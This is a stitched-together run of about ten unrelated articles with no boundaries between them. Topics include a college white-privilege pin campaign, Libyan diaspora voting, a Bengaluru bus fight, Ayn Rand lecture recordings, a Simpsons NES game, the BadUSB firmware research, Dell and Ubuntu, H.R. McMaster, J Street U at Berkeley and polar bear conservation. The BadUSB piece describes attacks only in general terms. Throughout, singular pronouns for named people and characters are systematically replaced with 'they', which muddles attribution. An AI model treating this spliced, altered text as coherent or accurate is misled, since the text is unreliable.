“Discussions about race are often perceived as being only open to people of color, but I think it is just as important for white people to partake in conversations about race,” Aileen Ida, president of the College Democrats, told The College Fix via email.
Ida said white people are continually allowing for a societal system of oppression to occur unless they work against it. The white puzzle piece pin represents racial struggles of all sorts.
“No matter how accepting someone is, that doesn't stop them from being part of a system based on centuries of inequality,” they said, adding the campaign transcends politics.
Take a quick glimpse of what our campaign will involve! pic.twitter.com/bH2EC1lILl — Etown College Dems (@EtownCollegeDem) February 10, 2017
Asked if all white students are privileged, Ida responded “yes,” but clarified that they don't think all whites are socioeconomically privileged. Ida declined to cite specific examples of white privilege.
They also clarified that it's not just white students who can wear the pins, that students of all races should take part to start a campuswide discussion that crosses racial divides.
Yet, they note most people of color already have to live with racism while white people don't.
“I believe that this [inherent white privilege] can be seen in the day-to-day life of people of color versus the day-to-day life of white people,” Ida said. “Most people of color don't have a choice but to consider how their race affects their lives on a daily basis, this is not true for most white people.”
According to the campaign's official Facebook page, the project is similar to one started by a Lutheran pastor who made a commitment to “wear a white puzzle piece pin every day for a year to force themselves to think about their white privilege and the impact white privilege has on people of color.”
The Elizabethtown College Democrats' effort also “forces everybody to think about racial issues people face daily,” its Facebook page states. The campaign is slated to last through the month and beyond.
MORE: University's ‘Whiteness Forum' takes ‘critical look at whiteness'
MORE: University offers class on ‘The Problem of Whiteness'
Like The College Fix on Facebook / Follow us on Twitter
IMAGE: Shutterstock
Hundreds of Libyan Canadians from across the country descended on Ottawa Saturday to take part in Libya's first free election since longtime dictator Moammar Gadhafi was deposed nine months ago.
Mohamed Sati was badly injured during fighting in Misrata and was one of 18 soldiers who received medical treatment in Canada. (CBC)
Libyans are electing a temporary elected assembly responsible for picking a cabinet and prime minister. It's the first election since 1965.
Results are expected in about a week.
Canada is among six nations where the Libyan diaspora were casting ballots Saturday. Polls opened Tuesday in Ottawa.
Mohamed Sati was badly wounded during the fighting in Misrata and was one of 18 Libyan soldiers to receive medical treatment in Canada.
Speaking through a translator, Sati told CBC News it's the duty of all Libyans to vote to show their gratitude for the sacrifices soldiers made.
Jalal Elgallal, former spokeman for the National Transitional Council, said voting overseas in places like Canada likely encouraged people in Libya. (CBC)
Jalal Elgallal is a former spokesperson for the National Transitional Council.
"It's also an encouragement to the Libyans there," Elgallal said. "If these Canadians can go through the trouble of travelling all over Canada to come here to be part of this historical moment, it's encouragement."
Fathi Ghanai drove with their family from Halifax to take part.
"To vote for the first Libyan election, we are so excited about it," Ghanai said. "It's such a tremendous moment."
Fight
The fight broke out after the conductor confiscated the bus passes of the three men.
A Bengaluru bus conductor and three passengers were booked for assault by the city police on Thursday, following an altercation among them near Gangammanagudi bus station.
Aruna, a BMTC bus conductor, lodged a complaint alleging that they were abused and assaulted by three men, all diploma students of MN Technical Institute in the city. In their counter-complaint the men said that the conductor bit them.
Shailaja, Inspector at Gangammanagudi police station, said that Aruna, ​in their complaint, admitted that they bit two of the three men.
An onlooker had recorded a video of the fight, a copy of which is with The News Minute. In the video, Aruna is seen biting the men even as a traffic police officer is trying to sort out the issue. Aruna later falls to the ground after one of the men pushes them
"The bus was going towards Kammagondanahalli, where the men were to get off to go to college. In their complaint, Aruna said that they asked the three men – Puneet (20), Pavan (20) and Guru (21), not to stand on the foot-board of the bus as it was not safe. Once they were inside, they confiscated their bus passes," Shailaja said.
"What triggered the fight was that the men apparently spoke to them disrespectfully when they asked them for their passes. This turned into a full blown argument and a fight outside the bus station," they added.
However, the men, who filed a counter-complaint, said that it was Aruna who triggered the fight and even assaulted them later.
"According to them, when they asked them to return their bus pass, they denied them and told them to collect it from the main Majestic office. When the students asked them to give them a letter saying so, the conductor started getting angry and became violent," said Shailaja.
Shailaja said that all the four were taken to the hospital for a basic medical check up.
The BMTC did not answer The News Minute's calls.
Government & Business | More
by The Editors | June 18, 2015
Share
In 1961 Ayn Rand was invited to speak at the Ford Hall Forum in Boston, America's oldest continuously operating free public lecture series. This marked the beginning of Rand's relationship with the Forum.
Over the years, Rand gave several talks in which they applied their philosophy of Objectivism on a wide range of topics such as art, censorship, capitalism, antitrust, abortion, the moon landing, the military draft, egalitarianism, inflation, Ronald Reagan and the religious right.
Now you can now relive Rand's twenty years at the Ford Hall Forum.
The Intellectual Bankruptcy of Our Age (1961) | Download
America's Persecuted Minority: Big Business (1961) | Download
The Fascist New Frontier (1962) | Download
Is Atlas Shrugging? (1964) | Download
The New Fascism: Rule by Consensus (1965) | Download
Our Cultural Value-Deprivation (1966) | Download
The Wreckage of the Consensus (1967) | Download
What Is Capitalism? (1967) | Download
Of Living Death (1968) | Download
Apollo and Dionysus (1969) | Download
The Anti-Industrial Revolution (1970)
The Moratorium on Brains (1971) | Download
A Nation's Unity (1972) | Download
Censorship: Local and Express (1973) | Download
Egalitarianism and Inflation (1974) | Download
The Moral Factor (1976) | Download
Global Balkanization (1977) | Download
Cultural Update (1978) | Download
Age of Mediocrity (1981) | Download
The Simpsons: Bart vs. the World is a side-scrolling platform game based on the Simpsons franchise and features many aspects from the television series. It was released in 1991 for the Nintendo Entertainment System, and in 1993 for Amiga, Atari ST, Game Gear and Sega Master System. In the game, the player controls Bart as they travel around the world on a scavenger hunt while facing against Mr. Burns' family and agents. The game has received mixed reviews from critics.
Plot [ edit ]
The game is based on the animated television series The Simpsons.[1] On the Krusty the Clown Show, Bart Simpson wins the opportunity to participate in a Round-the-World scavenger hunt. However, the contest has been rigged by Mr. Burns' assistant, Smithers, in order for Burns to rid themselves of the Simpson family for all the trouble they have caused them over the years. Burns sends their agents and fellow family members to take care of the Simpsons during the scavenger hunt. Bart travels through various real-world locations collecting items, with occasional cameos from the other Simpsons family members.[2][3]
Gameplay [ edit ]
The Simpsons: Bart vs. the World is a 2D side-scrolling platform game.[4][5] Single-player is the only mode available.[6] There are four major areas in the game: China, the North Pole, Egypt and Hollywood, and each has several stages to play through. The final stage of each area pits Bart against a boss — all of which are members of the Burns clan: third cousin Fu Manchu Burns, second cousin's grand-nephew The Abominable Snow Burns, maternal grand-uncle Ramses Burns and unspecified relation Eric von Burns.[3][7]
In each stage, Bart must navigate through the area, collecting items such as firecracker balls for self-defense and Squishees to restore health (Bart can take up to five hits before dying). By grabbing a cape, Bart can become their superheroic alter-ego, Bartman, and fly for limited periods. The most important items in each stage are Krusty-brand souvenirs. There is one in every stage, and Bart must find them all in order to get the best ending (as well as unlocking a bonus Hollywood level).[3][7][8] The other Simpsons also appear to give hints on where the souvenirs are.[3][7] There are also several mini-games in each area, with puzzles such as a matching-card game and a trivia game based on events in actual episodes (from the first two seasons only).[1][3]
Development [ edit ]
The game was first developed by Imagineering and published by Acclaim in 1991 for the home console Nintendo Entertainment System (NES).[4][9] It was the second The Simpsons game to be released for the NES, after Bart vs. the Space Mutants.[5] In 1993, Bart vs. the World was released for the home console Sega Master System (SMS), the personal computers Atari ST and Amiga, and the handheld console Game Gear (GG).[9] The publishers for these versions were Flying Edge (SMS and GG),[10][11] Virgin Games (Amiga),[12] and Acclaim (ST).[13] The developers were Arc Developments (GG and ST) and Virgin Games (Amiga).[11][12][13] The NES version of the game includes the theme song from The Simpsons.[1]
Reception [ edit ]
Reception Review score Publication Score AllGame [1]
Reviews of Bart vs. the World have been mixed. GamePro gave the NES version an 80/100 rating, commenting that "after running them through the rigors of a zany-but-strenuous Nintendo workout, the conclusion of this review became obvious: if ya loved Bart in Bart vs. the Space Mutants, you're gonna like them in Bart vs. the World. Despite a few shortcomings here and there, Bart's new cart is a world-beater!"[14] Tribune Media Services also gave it a positive review, writing that "the storyline is great, the graphics, as Bart would say, are 'cool, man', and the action and control are terrific. This version of The Simpsons is a lot more complex than the first — not harder, there's just more to it."[3]
AllGame's Brett Alan Weiss was more negative, giving the NES version 2.5/5 stars. They wrote that "most of the puzzles [...] are childish and boring. Even younger kids will get tired with these silly little games after a while. [...] The Simpsons trivia is kind of cool; you'll find yourself remembering fondly several of the earlier episodes. However, the questions begin repeating themselves a little sooner than they should." They added that "once you are through toying around with the puzzles, you'll find that the meat of the game is lame as well. The level design is far from clever, the controls are sluggish, and the action is dull."[1] A review in the Italian newspaper La Repubblica said the game was "very playable, though not particularly original."[15]
The Dutch magazine Power Unlimited rated the Game Gear version 70/100, noting that it "consists partly of boring platform worlds" that are "not really worth the effort". They added, however, that "fortunately, there are also some simple puzzle games that are fun" and keep the game above mediocrity.[14] A Game Players review gave the Game Gear version a 62/100 rating. The magazine wrote that "the twisted humor of other Simpsons games isn't there and the action segments could be from any game. Ignore it for home, but pack it for the beach."[14]
In 2009, 1UP.com editor Bob Mackey reviewed the NES game in 1UP.com's official Retro Gaming Blog. They wrote that it had the same problems that Bart vs. the Space Mutants had, such as "lousy jumping physics", and that it "also manages to strip away the novelty that made the original Simpsons NES game worth checking out in the first place. The sequel is a straight-up, cookie-cutter platformer without any real Simpson-y touches to satisfy fans of the show; Bart finds themselves wandering through generic side-scrolling levels, with a Simpsons character showing up every now and then to remind you that this is an actual licensed product and not just a ROM hack."[5]
Entertainment Weekly gave the game a B and wrote that "A nice multicultural touch — at one point in this travel-action game, Bart skateboards down China's Great Wall — puts this a notch above Acclaim's other Simpsons games, if not up to the standards of the irrepressibly subversive TV show."[16]
References [ edit ]
Computer users pass around USB sticks like silicon business cards. Although we know they often carry malware infections, we depend on antivirus scans and the occasional reformatting to keep our thumbdrives from becoming the carrier for the next digital epidemic. But the security problems with USB devices run deeper than you think: Their risk isn't just in what they carry, it's built into the core of how they work.
That's the takeaway from findings security researchers Karsten Nohl and Jakob Lell plan to present next week, demonstrating a collection of proof-of-concept malicious software that highlights how the security of USB devices has long been fundamentally broken. The malware they created, called BadUSB, can be installed on a USB device to completely take over a PC, invisibly alter files installed from the memory stick, or even redirect the user's internet traffic. Because BadUSB resides not in the flash memory storage of USB devices, but in the firmware that controls their basic functions, the attack code can remain hidden long after the contents of the device's memory would appear to the average user to be deleted. And the two researchers say there's no easy fix: The kind of compromise they're demonstrating is nearly impossible to counter without banning the sharing of USB devices or filling your port with superglue.
“These problems can't be patched,” says Nohl, who will join Lell in presenting the research at the Black Hat security conference in Las Vegas. “We're exploiting the very way that USB is designed.”
>'In this new way of thinking, you have to consider a USB infected and throw it away as soon as it touches a non-trusted computer.'
Nohl and Lell, researchers for the security consultancy SR Labs, are hardly the first to point out that USB devices can store and spread malware. But the two hackers didn't merely copy their own custom-coded infections into USB devices' memory. They spent months reverse engineering the firmware that runs the basic communication functions of USB devices—the controller chips that allow the devices to communicate with a PC and let users move files on and off of them. Their central finding is that USB firmware, which exists in varying forms in all USB devices, can be reprogrammed to hide attack code. “You can give it to your IT security people, they scan it, delete some files, and give it back to you telling you it's 'clean,'" says Nohl. But unless the IT guy has the reverse engineering skills to find and analyze that firmware, “the cleaning process doesn't even touch the files we're talking about.”
The problem isn't limited to thumb drives. All manner of USB devices from keyboards and mice to smartphones have firmware that can be reprogrammed—in addition to USB memory sticks, Nohl and Lell say they've also tested their attack on an Android handset plugged into a PC. And once a BadUSB-infected device is connected to a computer, Nohl and Lell describe a grab bag of evil tricks it can play. It can, for example, replace software being installed with with a corrupted or backdoored version. It can even impersonate a USB keyboard to suddenly start typing commands. “It can do whatever you can do with a keyboard, which is basically everything a computer does,” says Nohl.
The malware can silently hijack internet traffic too, changing a computer's DNS settings to siphon traffic to any servers it pleases. Or if the code is planted on a phone or another device with an internet connection, it can act as a man-in-the-middle, secretly spying on communications as it relays them from the victim's machine.
Most of us learned long ago not to run executable files from sketchy USB sticks. But old-fashioned USB hygiene can't stop this newer flavor of infection: Even if users are aware of the potential for attacks, ensuring that their USB's firmware hasn't been tampered with is nearly impossible. The devices don't have a restriction known as “code-signing,” a countermeasure that would make sure any new code added to the device has the unforgeable cryptographic signature of its manufacturer. There's not even any trusted USB firmware to compare the code against.
The element of Nohl and Lell's research that elevates it above the average theoretical threat is the notion that the infection can travel both from computer to USB and vice versa. Any time a USB stick is plugged into a computer, its firmware could be reprogrammed by malware on that PC, with no easy way for the USB device's owner to detect it. And likewise, any USB device could silently infect a user's computer. “It goes both ways,” Nohl says. “Nobody can trust anybody.”
But BadUSB's ability to spread undetectably from USB to PC and back raises questions about whether it's possible to use USB devices securely at all. “We've all known if that you give me access to your USB port, I can do bad things to your computer,” says University of Pennsylvania computer science professor Matt Blaze. “What this appears to demonstrate is that it's also possible to go the other direction, which suggests the threat of compromised USB devices is a very serious practical problem.”
Blaze speculates that the USB attack may in fact already be common practice for the NSA. They point to a spying device known as Cottonmouth, revealed earlier this year in the leaks of Edward Snowden. The device, which hid in a USB peripheral plug, was advertised in a collection of NSA internal documents as surreptitiously installing malware on a target's machine. The exact mechanism for that USB attack wasn't described. “I wouldn't be surprised if some of the things [Nohl and Lell] discovered are what we heard about in the NSA catalogue.”
>The alternative is to treat USB devices like hypodermic needles.
Nohl says they and Lell reached out to a Taiwanese USB device maker, whom they decline to name, and warned the company about their BadUSB research. Over a series of emails, the company repeatedly denied that the attack was possible. When WIRED contacted the USB Implementers Forum, a nonprofit corporation that oversees the USB standard, spokesperson Liz Nardozza responded in a statement. “Consumers should always ensure their devices are from a trusted source and that only trusted sources interact with their devices,” they wrote. “Consumers safeguard their personal belongings and the same effort should be applied to protect themselves when it comes to technology.
Nohl agrees: The short-term solution to BadUSB isn't a technical patch so much as a fundamental change in how we use USB gadgets. To avoid the attack, all you have to do is not connect your USB device to computers you don't own or don't have good reason to trust—and don't plug untrusted USB devices into your own computer. But Nohl admits that makes the convenient slices of storage we all carry in our pockets, among many other devices, significantly less useful. “In this new way of thinking, you can't trust a USB just because its storage doesn't contain a virus. Trust must come from the fact that no one malicious has ever touched it," says Nohl. "You have to consider a USB infected and throw it away as soon as it touches a non-trusted computer. And that's incompatible with how we use USB devices right now."
The two researchers haven't yet decided just which of their BadUSB device attacks they'll release at Black Hat, if any. Nohl says they worry that the malicious firmware for USB sticks could quickly spread. On the other hand, they say users need to be aware of the risks. Some companies could change their USB policies, for instance, to only use a certain manufacturer's USB devices and insist that the vendor implement code-signing protections on their gadgets.
Implementing that new security model will first require convincing device makers that the threat is real. The alternative, Nohl says, is to treat USB devices like hypodermic needles that can't be shared among users—a model that sows suspicion and largely defeats the devices' purpose. “Perhaps you remember once when you've connected some USB device to your computer from someone you don't completely trust,” says Nohl. “That means you can't trust your computer anymore. This is a threat on a layer that's invisible. It's a terrible kind of paranoia.”
It's a small step for Dell and symbolic victory for Ubuntu Server Edition, Canonical's Linux distribution. Specifically, selected Dell PowerEdge servers are now certified to run Ubuntu Server Edition. Does that mean Dell is shifting away from Red Hat Enterprise Linux and Novell SUSE Linux? And what are the implications for Linux channel partners? Hmmm... Here's the reality check.
It's a small step for Dell and symbolic victory for Ubuntu Server Edition, Canonical's Linux distribution. Specifically, selected Dell PowerEdge servers are now certified to run Ubuntu Server Edition. Does that mean Dell is shifting away from Red Hat Enterprise Linux and Novell SUSE Linux? And what are the implications for Linux channel partners? Hmmm… Here's the reality check.
No doubt, Dell remains firmly committed to Red Hat and Novell SUSE Linux. In fact, Dell does not plan to factory install Ubuntu Server Edition. Nor does Dell's technical support teams officially support Canonical‘s operating system.
So what exactly is Dell doing with Ubuntu Server Edition? In a Sept. 27 blog post Dell states:
“The Dell Linux Engineering team has been working with Canonical over the past 2 years to certify Dell PowerEdge servers with the Ubuntu Server Edition operating system. Dell and Canonical have worked together to ensure that customers can feel confident in deploying Ubuntu on select PowerEdge servers in their production environments. Ubuntu Server Edition is not factory-installed by Dell and our technical support teams do not officially support the operating system. However, customers can purchase support contracts directly with Canonical at canonical.com.
Alas, too bad neither Dell nor Canonical mention channel partners as a potential safety net for Ubuntu Server Edition deployments.
To help improve systems management, Dell says, the PC giant has released OpenManage 6,3 compiled for Ubuntu 9.10. But here again, the release is “not officially supported by Dell or Canonical at this point.” For more details, Dell says readers should refer to the blog Dell OpenManage 6.3 for Ubuntu.
Real Progress?
Still, there is some progress here. Canonical's hardware certification site now lists Dell PowerEdge servers — which could be comforting to VARs and businesses that want to run Ubuntu Server Edition.
The Dell PowerEdge certification move comes amid some turbulence in the Linux server market:
Red Hat continues to show momentum with Linux, and customers are beginning to discover Red Hat Enterprise Virtualization (RHEV).
Some customers are delaying Novell SUSE Linux deployments until Novell's pending ownership status is addressed.
And let's not forget Oracle, which is starting to more heavily promote Oracle Linux.
Can Canonical really hope to compete against those server software giants? Hmmm…
A few years ago, Sun Microsystems promoted Ubuntu Server Edition on selected systems but that effort seems to have faded away — especially as Oracle digested Sun.
IBM does some work virtualizing Ubuntu desktops on centralized servers, but Big Blue hasn't said much about Ubuntu Server Edition.
HP in June 2009 certified selected ProLiant servers to run Ubuntu. But like Dell, HP isn't pre-installing Ubuntu Server Edition.
Dell: Canonical's Best Friend?
Still, Dell seems to be working with Canonical on a number of fronts. A few prime examples:
Dell in March 2010 included Ubuntu Server Edition and Eucalyptus as part of its private cloud strategy.
In June 2010, Dell actually stated that Ubuntu was safer than Windows, though the Dell statement has since been toned down.
And in July 2010, Dell made it clear that the company was preparing Ubuntu desktops and notebooks with Ubuntu 10.04 preinstalled.
Visit www.Dell.com/Ubuntu in the United States and you'll often find some Dell systems with Ubuntu preinstalled. Now, Dell seems to be taking interest in Ubuntu Server Edition.
But let's keep Dell's Ubuntu interests in perspective. For Ubuntu Server Edition to really succeed at Dell, the PC giant will need to (A) offer the operating system as a preinstalled option (B) support the operating system and (C) educate Dell PartnerDirect VARs about Ubuntu Server Edition. So far, A, B and C are yet to happen.
Sign up for The VAR Guy's Weekly Newsletter; Webcasts and Resource Center; and via RSS; Facebook; Identi.ca; Twitter and VARtweet.
President Trump's new national security adviser, H.R. McMaster, does not think that “radical Islamic terrorism” is a useful term, CBS News' Margaret Brennan confirms, putting them at odds with the president they serve. The New York Times first reported that they repudiated the phrase.
Like many conservatives, Mr. Trump has routinely suggested that the phrase is critical to addressing the terrorist threat against the U.S. During the presidential campaign, Mr. Trump repeatedly criticized the president and opponent Hillary Clinton for not using the term.
Fmr. CIA Director says new head of NSA, Gen. McMaster has a "stellar reputation"
“Is President Obama going to finally mention the words ‘radical Islamic terrorism?'” Mr. Trump wondered last year in a Tweet. “If they don't, they should immediately resign in disgrace.”
After the Orlando nightclub massacre, Obama derided Mr. Trump over the importance they placed on the phrase. “What exactly would use this label accomplish? What exactly would it change?” they said in June 2016. “Would it make ISIL less committed to trying to kill Americans? Would it bring in more allies? Is there a military strategy that is served by this? The answer is -- none of the above. Calling a threat by a different name does not make it go away.”
McMaster is seen as someone who can bring to the National Security Council adviser position a clear-eyed assessment of foreign threats, in no small measure because of a book they wrote years ago called “Dereliction of Duty,” which exposed what they saw as the failure of the top U.S. military officials to tell President Lyndon Johnson the truth about how disastrous the Vietnam war would be for the U.S.
Former CIA Director John Brennan said Sunday on CBS News' “Face the Nation” that McMaster's position on the issue, “gives me even greater confidence that they are going to do what they need to do as national security adviser and hopefully be able to sway the thoughts and ideas and inclinations of some of the individuals who work with them in the White House complex.”
However, there are questions about how much influence McMaster will have on the president, compared to chief White House strategist Steve Bannon and others in the White House, who share the belief that the major terrorist threats against the U.S. are inextricably tied to Islam. The inability of White House Press Secretary Sean Spicer to condemn anti-Muslim groups from the podium last week speaks to that difference.
Last week, Brennan asked Spicer, “The Southern Poverty Law Center said that the number of anti-Muslim groups in the U.S. has tripled between 2015 and 2016, during the time of the campaign. Is this message, within the administration — anti-Semitism is not allowed, xenophobia is not allowed. Anti-Muslim sentiment within the administration: Has the president been forceful about that particular issue?”
Spicer did not address anti-Muslim sentiment and instead brought up the threat of terrorism in their response.
“I think that the president, in terms of their desire to combat radical Islamic terrorism, they understand that people who want to express a peaceful position have every right under our Constitution, but if you come here or want to express views that seek to do our country or our people harm, they are going to fight it aggressively -- whether it is domestic acts that are going on here, or attempts through people abroad to come into this country,” they told Brennan.
“So there's a big difference between preventing attacks and making sure that we keep this country safe so that there is no loss of life, and allowing people to express themselves in accordance with our First Amendment. Those are two very, very different — different, different things.”
U.C. Berkeley's Jewish Student Union includes groups such as Challah for Hunger, Bears for Israel and the Jewish Business Association.
J Street U will not be joining them.
At a Nov. 16 general meeting, the union voted to deny membership to the Berkeley chapter of J Street U, the college division of the left-leaning and often controversial Israel lobby. The final tally: nine for, 10 against, two abstentions.
It takes a two-thirds majority to approve membership. Representatives from each JSU member organization, as well as select individual members, have a vote.
Jacob Lewis, co-president of the pro-Israel student group Tikvah and one of those casting a “no” vote, said, “J Street is not pro-Israel but an anti-Israel organization that, as part of the mainstream Jewish community, I could not support.”
Now two years old, J Street U has chapters on 32 campuses across the country and a presence on many others. This is the first time a chapter has been denied membership in a Jewish student union, according to national director Daniel May.
The Berkeley chapter of J Street U has 11 members and has been active for more than a year, staging events and bringing guest speakers to campus. Israeli-born member Alon Mazor said they had been excited about “having a voice on campus and especially being part of the Jewish community. The obvious way was becoming a member organization of the JSU.”
They knew it would be no cakewalk. Mazor, 21, expected resistance from some within the JSU, which is why they and fellow J Street U member Simone Zimmerman prepared their case at the meeting.
“We presented our group, the mission and why we wanted to be part [of JSU],” they said. “There was a silence in the room. Then the discussion got more heated. A lot of people had prepared statements and quotations. It became a very charged atmosphere.”
Zimmerman, 21, also expected resistance but said they hoped to “appeal to students through framing it in the lens of J Street adding to the conversation. It's OK to disagree with our political views, but we want you to recognize that we're part of this community, and we have a right to have these conversations.”
Lewis, 20, said they had been suspicious of the group ever since attending a J Street U event last year. The guest speaker was Assaf Sharon of the Sheikh Jarrah Solidarity Movement in Israel, which aligns with east Jerusalem Arabs who claim Israel is encroaching on their neighborhoods.
Lewis remembered Sharon saying Jerusalem “is a symbol of violence, and that anything beyond the Green Line is a settlement. It was a virulently hateful event about Israel.
According to the J Street U website, the group supports “Israel's right to exist as a homeland for the Jewish people, a democratic state, and a sovereign nation with the right to defend itself against external threats.”
Lewis stressed that it was not only their group, Tikvah, that opposed admitting J Street U, but rather a majority of voting members and representatives from JSU member groups.
“It demonstrates that this is pretty much a main view of the Jewish community,” they added.
Although the Jewish Student Union is an independent group within Berkeley's Associated Students of the University of California, it is also affiliated with Hillel of Berkeley and derives some funding from that organization.
Hillel of Berkeley executive director Rabbi Adam Naftalin-Kelman did not attend the Nov. 16 meeting, but they said Hillel has no say in how the Jewish Student Union runs its affairs.
“As any [Hillel-affiliated] group, they do have to follow our kashrut, Israel and spending guidelines,” they said, “but they are an ASUC group we support and fund. What their criteria are for adding groups, I can't speak to.”
Though they wouldn't comment directly on the vote, Naftalin-Kelman did say that “We have to be very careful in how we talk about Israel and how we define our tent, because the stability and strength of Israel's future is dependent on the strength of our Jewish community, and by that I mean every facet of our community. We always have to be careful about who we include and exclude.”
When the vote was announced at the meeting, J Street U's Mazor wasn't surprised.
“We were ready for it,” they said. “But it was very emotional because of the things that were said, like ‘We can't trust you.' To exclude people from the conversation doesn't seem to be productive.”
Added Zimmerman, “It was hard listening to a group of people who don't want us to be part of this community. We are going to continue … but I think it is a pretty serious blow that we were rejected from being part of the established community.”
Lewis said the vote does not deny individual J Street U members from participating in JSU activities or Jewish life on campus. They said, however, that Berkeley's umbrella Jewish student group has a right to establish guidelines that “conform to a basic idea of being pro-Israel.”
“There's a lot of room for criticism of [Israeli] policy,” Lewis said. “That's a good thing. People will have a wide variety of criticisms. But it's a matter of how and why you criticize.”
When Steven Amstrup was five, their dream was to go into the wilds and study bears. For most of their adult life they did just that. Amstrup spent 30 years studying polar bears in Alaska for the United States Geological Survey, a job they called "the ripest plum in the wildlife profession".
But what Amstrup didn't know when they were a preschooler was that the climate would warm, sea ice would start to disappear and polar bears would face a dwindling habitat. These facts might make the dream of working with bears an impossibility for future generations.
In 2007, they led an international team of researchers in preparing nine pivotal reports that led to the 2008 listing of polar bears as a threatened species under the US Endangered Species Act. Shortly afterward, Amstrup became the chief scientist of Polar Bears International (PBI), a non-profit devoted to conserving polar bears and their Arctic habitat. In 2012, they received the Indianapolis Prize, the Nobel Prize of conservation that is given every other year to a person who has made extraordinary contributions to animal conservation.
Working at PBI, Amstrup is frequently asked whether scientists can, or can't, save the polar bear. We put some of the most common, and sometimes bizarre questions, to them to see if there is hope for this iconic species.
What is the most important thing that can be done to save the polar bear?
Absolutely the most important thing - and really the only thing - that will save polar bears in the long run is to stop the rise of greenhouse gases and stop the warming of the planet. There are many things that we can do on the ground to make a better world for polar bears while we are also addressing the greenhouse gas issue, but my 2010 research and subsequent studies have shown that on the ground activities are not by themselves capable of saving the polar bears.
In conservation we have an existing model that when there is a challenge to a species or a habitat, we can build a fence to protect a habitat, or we can hire guides to protect the species from poachers, and then we can go home and sleep thinking that we have saved them. But we can't build a fence protecting sea ice from rising temperatures.
This is a conservation challenge that can't be met in the Arctic, it has to be met by all of us, by you and me, wherever we live.
Could the bears be relocated to Antarctica where there is still a lot of sea ice?
Certainly we could relocate the bears and perhaps they would flourish for a while, and the reason they would flourish is because the penguins and the seals that live in the southern hemisphere have not evolved to evade an ice surface predator - polar bears catch their prey by walking around on the surface of the sea ice.
In the southern hemisphere, the ecological equivalent of the polar bear is probably the leopard seal, and the leopard seal preys on penguins and seals from underneath. That means that penguins and seals are always on the alert when they are under the sea ice, but they don't really care much about what goes on when they are above the sea ice.
That is part of the reason that biologists can study many of the Antarctic seals just by walking up to them, and rolling them over and measuring them. They are just not afraid of things on the surface. They haven't evolved that fear. You put polar bears into that environment and it wouldn't take long for the polar bears to wipe out all of the penguins and the seals, and then of course all of the polar bears would perish.
But even if that didn't happen, even if some of the species became aware enough to protect themselves from polar bears, the Antarctic is warming as well so you would only forestall the inevitable.
But would the polar bears be able to adapt their behavior to Antarctica?
They are behaviorally plastic enough that if they just see a whole bunch of things to eat on top of the ice they would eat them. There are lots of things to eat down there that would be easy pickings. Imagine a couple of polar bears rampaging through a penguin colony. How difficult would it be for them to catch penguins? I think probably all of my colleagues would agree that it would be an environmental disaster.
Would restricting hunting save the polar bear?
There are lots of things that we can theoretically do on the ground to make the world a little bit better for polar bears while we address the bigger issue of climate change. Of all of those things, managing intentional kills from hunting and unintentional kills when bears get into trouble with people appear to be the most important actions we can take.
It is important to remember that wild animals, if they have a stable healthy habitat, are a renewable resource and they can be managed sustainably. The problem with polar bears is that, right now, their habitat isn't stable. Data suggests that in some areas polar bear numbers would be declining without any hunting. So the short answer is that restricting hunting in some areas certainly could save more bears for the time that we stop the decline of the sea ice, but by itself it will not save the polar bears.
If we supplied food to them would that prolong their extinction?
In the long run it can't save polar bears. We couldn't possibly feed all the world's polar bears. The cost of it, the greenhouse gas footprint in doing it, would be astronomical. In the short run, is it something that managers could be forced to consider?
It could be. I did a back-of-the-envelope calculation that said if we fed polar bears the same diet they were fed in zoos, the cheapest option, just feeding the bears in western Hudson Bay which is by far the most accessible of all the polar bear populations would cost nearly a million dollars a month. So could we do that for a couple of years? Yeah, maybe. But could we afford to do it forever? I think not. If we want polar bears we have to save their habitat.
Could polar bears be taught to hunt like grizzly bears?
I think that Mother Nature has done a great experiment that answers this question. If you look across the range of polar bears there are many areas where there are grizzly bears that live onshore, adjacent to the polar bears that live on the sea ice offshore. Brown or grizzly bears occur all around the world in a variety of habitats.
Those that live in the Arctic live at low densities and are among the smallest of all of the brown bears. If you are a bear, the arctic terrestrial habitat is a very poor place to live. It might support hundreds of thousands of caribou but it doesn't support very many bears and it doesn't support big bears. Polar bears, on the other hand are the largest bears in the world. Their large size is supported by their rich diet of seals. What logic would we use to expect that an environment that supports only small numbers of small bears will somehow be able to support whole populations of very large bears?
What about transporting floating platforms to the Arctic to help save the polar bears?
Simplistically it is something that you might expect people to say: "Oh, polar bears need ice to stand on and, if the ice is melting, why not just make fake ice." There are a couple of real challenges there, one of which is that the people who are suggesting this solution just don't understand the scale of our problem.
If you just look at the average decline of our summertime sea ice in that last 30 years, we have lost nearly twice the area of the state of Alaska. Replacing that would require a awful lot of Styrofoams.
But even more importantly is that the sea ice isn't just a platform for polar bears to walk around on. It is the source of the vitality of their ecosystem. The life support for polar bears begins with algae, fungi and bacteria that grow on the undersurface of the sea ice. Larger organisms, shrimp-like creatures feed on those microscopic organisms, fish eat those larger organisms, seals eat the fish and polar bears eat the seals.
So if you try to replace that ice with a slab of Styrofoam, or something else, it is very unlikely to support that ecosystem. So between the spacial area that we are talking about and the inability of an artificial substrate to really support the ecosystem, it really just doesn't make much sense.
And imagine what the costs would be and what the greenhouse gas footprint would be if we wanted to make such large artificial platforms.
Do you think that we will be able to keep populations of bears in zoos?
There are examples of some populations that have been nearly extinct and were preserved in zoos or other captive situations and then have been reintroduced into the wild. There is the Black-footed Ferret Recovery Program based in Wyoming, where the animals have been raised in captivity and reintroduced into the wild with some success. California Condors were down to a handful in the wild and now there are many more because they were raised in zoos and other captive situations. I think that those animals lend themselves better to be raised in a captive situation than polar bears do.
Polar bears require two and a half years of hunting with their mother to figure out how to make a living in the Arctic. It is not very likely that we could emulate that in captivity. It is one thing to do it with an animal that weighs a couple of pounds like a ferret. It is another thing to do with a bear that weighs several hundred pounds.
There may be some opportunity, if we maintain some small number of bears in the wild, that genetic diversity maintained in zoos could be brought to bear in the wild. So we might not reintroduce bears into the wild but we might be able to, through enhanced reproductive techniques, introduce genes back into the wild.
But I think that we are asking questions here about last-ditch efforts. Are we going to resign ourselves to not do anything about global warming right now, and put all of our hopes into reintroducing bears or their genes into a future world?
I think it is important to remember the challenges here are not just about polar bears. Polar bears are just harbingers of what is to come to all of us. In 40 or 50 years, if we have not done anything to save the sea ice, I don't think anybody is going to care much about polar bears. Then, we will be facing increased drought, flood, and famine. Crop failures and human refugee problems, beyond anything we can now imagine, will command all of our attention. At that point I don't think polar bears or any other wildlife are going to get much attention.
It sounds really dire. Is there any hope for polar bears?
Absolutely. It is critical to remember the warming that threatens polar bears is human-caused. If we caused it, we can fix it and there is lots of science out there that says we still can act in time to save polar bears.
We just need to get our act together and do it.
